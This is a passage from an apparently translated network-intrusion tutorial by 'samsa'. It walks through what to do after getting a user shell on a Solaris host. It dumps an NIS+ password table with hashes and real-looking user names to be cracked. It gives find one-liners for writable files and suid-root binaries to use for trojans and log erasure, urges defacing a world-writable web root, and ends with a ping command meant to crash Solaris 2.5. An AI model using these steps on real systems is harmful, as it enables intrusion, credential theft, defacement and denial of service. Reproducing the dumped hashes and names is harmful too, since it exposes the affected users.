samsa Network Intrusion Tutorial (5)

/ns/cn/jc/data/20010129103927.htm

4. Breaking and entering
Once you have a (normal user) shell on the target machine, there is a lot you can do.
1) /etc/passwd, /etc/shadow
Read what you can, take what you can, crack what you can.
1.1) Directly (no NIS)

$ cat /etc/passwd
......

1.2) NIS (yp: Yellow Pages)

$ domainname
cas.ac.cn
$ ypwhich -d cas.ac.cn
$ ypcat passwd

1.3) NIS+

ox% domainname
ios.ac.cn
ox% nisls
ios.ac.cn:
org_dir
groups_dir
ox% nisls org_dir
org_dir.ios.ac.cn.:
passwd
group
auto_master
auto_home
bootparams
cred
ethers
hosts
mail_aliases
sendmailvars
netmasks
netgroup
networks
protocols
rpc
services
timezone
ox% niscat passwd.org_dir
root:uop5Jji7N1T56:0:1:Super-User:/:/bin/csh:9841::::::
daemon:NP:1:1::/::6445::::::
bin:NP:2:2::/usr/bin::6445::::::
sys:NP:3:3::/::6445::::::
adm:NP:4:4:Admin:/var/adm::6445::::::
lp:NP:71:8:Line Printer Admin:/usr/spool/lp::6445::::::
smtp:NP:0:0:Mail Daemon User:/::6445::::::
uucp:NP:5:5:uucp Admin:/usr/lib/uucp::6445::::::
listen:*LK*:37:4:Network Admin:/usr/net/nls::::::::
nobody:NP:60001:60001:Nobody:/::6445::::::
noaccess:NP:60002:60002:No Access User:/::6445::::::
guest:NP:14:300:Guest:/hd2/guest:/bin/csh:10658::::::
syscd:qkPu7IcquHRRY:120:10::/usr/syscd:/bin/csh:::::::
peif:DyAkTGOg/2TCY:819:800:Pei Fei:/home/peif:/bin/csh:10491::::::
lxh:T4FjqDv0LG7uM:510:500:Liu Xuehui:/home/lxh:/bin/csh:10683::::::
fjh:5yPB5xLOibHD6:507:500:Feng Jinhui:/home/fjh:/bin/csh:10540::::::
lhj:UGAVVMvjp/9UM:509:500:Li Hongju:/home/lhj:/bin/csh:10142::::::
....

(samsa:gotcha!!!)

2) Looking for system holes
2.0) Gather information

ox% uname -a
SunOS ox 5.5 Generic sun4d sparc SUNW,SPARCserver-1000
ox% id
uid=820(ywc) gid=800(ofc)
ox% hostname
ox
ox% domainname
ios.ac.cn
ox% ifconfig -a
lo0: flags=849<UP,LOOPBACK,RUNNING,MULTICAST> mtu 8232
inet 127.0.0.1 netmask ff000000
be0: flags=863<UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST> mtu 1500
inet 159.226.5.188 netmask ffffffc0 broadcast 159.226.5.191
ipd0: flags=c0<RUNNING,NOARP> mtu 8232
inet 0.0.0.0 netmask 0
ox% netstat -rn
Routing Table:
Destination Gateway Flags Ref Use Interface
-------------------- -------------------- ----- ----- ------ ---------
127.0.0.1 127.0.0.1 UH 0 738 lo0
159.226.5.128 159.226.5.188 U 3 341 be0
224.0.0.0 159.226.5.188 U 3 0 be0
default 159.226.5.189 UG 0 1198
......

2.1) Find writable files and directories

ox% cd /tmp
ox% mkdir .hide
ox% cd .hide
ox% ls -ld `find / \( \( -type d -o -type f \) -a \( -perm -0002 -o -group 800 -a -perm -0020 \) \) -print` >.wr

(samsa: wr = writables: writable directories and files)

ox% grep '^d' .wr > .wd

(samsa: wd = writable directories)

ox% grep '^-' .wr > .wf

(samsa: wf = writable files: regular files)

ox% ls -l `find / \( -perm -4000 -a -user root \) -print` >.sr

(samsa: sr = suid roots)

2.1.1) Writable system configuration files: e.g. pam.conf, inetd.conf, inittab, passwd, etc.
2.1.2) Writable bin directories: e.g. /usr/bin, /usr/local/bin, etc. (see: Trojan horses)
2.1.3) Writable log files: e.g. /var/adm/wtmp, /var/adm/messages, etc. (for track erasing)

2.2) Defacing the home page
On the vast majority of systems the permissions under the http root directory are set wrong! Don't believe it? Look:

ox1% grep http /etc/inetd.conf
ox1% ps -ef | grep http
http 7538 251 0 14:02:35 ? 0:02 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/conf/httpd.conf
http 7567 251 0 15:16:46 ? 0:01 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/conf/httpd.conf
root 251 1 0 May 05 ? 3:27 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/conf/httpd.conf
......
ox1% cd /opt/home1/ofc/http/httpd
ox1% ls -l |more
total 530
drwxrwxrwx 11 http ofc 512 Jan 18 13:21 English
-rw-rw-rw- 1 http ofc 8217 May 10 09:42 Welcome.html
drwxr-sr-x 2 http ofc 512 Dec 24 15:20 cgi-bin
drwxr-sr-x 2 http ofc 512 Mar 24 1997 cgi-src
drwxrwxrwx 2 http ofc 512 Jan 12 15:05 committee
drwxr-sr-x 2 root ofc 512 Jul 2 1998 conf
-rwxr-xr-x 1 http ofc 203388 Jul 2 1998 httpd
drwxrwxrwx 2 http ofc 512 Jan 12 15:06 icons
drwxrwxrwx 2 http ofc 3072 Jan 12 15:07 images
-rw-rw-rw- 1 http ofc 7532 Jan 12 15:08 index.htm
drwxrwxrwx 2 http ofc 512 Jan 12 15:07 introduction
drwxr-sr-x 2 http ofc 512 Apr 13 08:46 logs
drwxrwxrwx 2 http ofc 1024 Jan 12 17:19 research

(samsa: Haha!! Almost all of it is writable, awesome, go change it, what are you waiting for??)

3) Denial of Service (DoS)
Using system holes to wreak havoc.
e.g. under Solaris 2.5 (2.5.1):

$ ping -sv -i 127.0.0.1 224.0.0.1
PING 224.0.0.1 56 data bytes

(samsa: and then the machine reboots, hehe)